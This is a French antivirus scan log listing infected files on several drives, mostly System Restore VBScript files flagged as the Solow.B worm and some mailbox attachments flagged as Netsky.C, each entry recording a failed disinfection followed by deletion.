Echec de la désinfection

C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
Supprimé

C:\WINDOWS\pagefile.sys.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

C:\WINDOWS\pagefile.sys.vbs=>(unicode)
Echec de la désinfection

C:\WINDOWS\pagefile.sys.vbs=>(unicode)
Supprimé

D:\pagefile.sys.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\pagefile.sys.vbs=>(unicode)
Echec de la désinfection

D:\pagefile.sys.vbs=>(unicode)
Supprimé

D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
Infecté par: Win32.Netsky.C@mm.Damaged

D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
Echec de la désinfection

D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe
Supprimé

D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)
Echec de la mise à jour

D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
Infecté par: Win32.Netsky.C@mm.Damaged

D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
Echec de la désinfection

D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif
Supprimé

D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)
Echec de la mise à jour

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142491.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142604.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142645.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142716.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142829.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142996.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143060.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143148.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143177.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143250.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143469.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143515.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143711.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143732.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143837.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143862.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143908.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144015.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144045.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144398.vbs=>(unicode)
Supprimé

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
Echec de la désinfection

D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145654.vbs=>(unicode)
Supprimé

F:\pagefile.sys.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\pagefile.sys.vbs=>(unicode)
Echec de la désinfection

F:\pagefile.sys.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142493.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142606.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142647.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142718.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142831.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142998.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143062.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143150.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143179.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143252.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143471.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143517.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143713.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143734.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143839.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143864.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143910.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144017.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144047.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144401.vbs=>(unicode)
Supprimé

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
Echec de la désinfection

F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145656.vbs=>(unicode)
Supprimé

H:\pagefile.sys.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\pagefile.sys.vbs=>(unicode)
Echec de la désinfection

H:\pagefile.sys.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142495.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143152.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143181.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143254.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143473.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143519.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143715.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143736.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143841.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143866.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143912.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144019.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144049.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
Infecté par: Win32.Worm.Vbs.Solow.B

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
Echec de la désinfection

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
Supprimé

H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
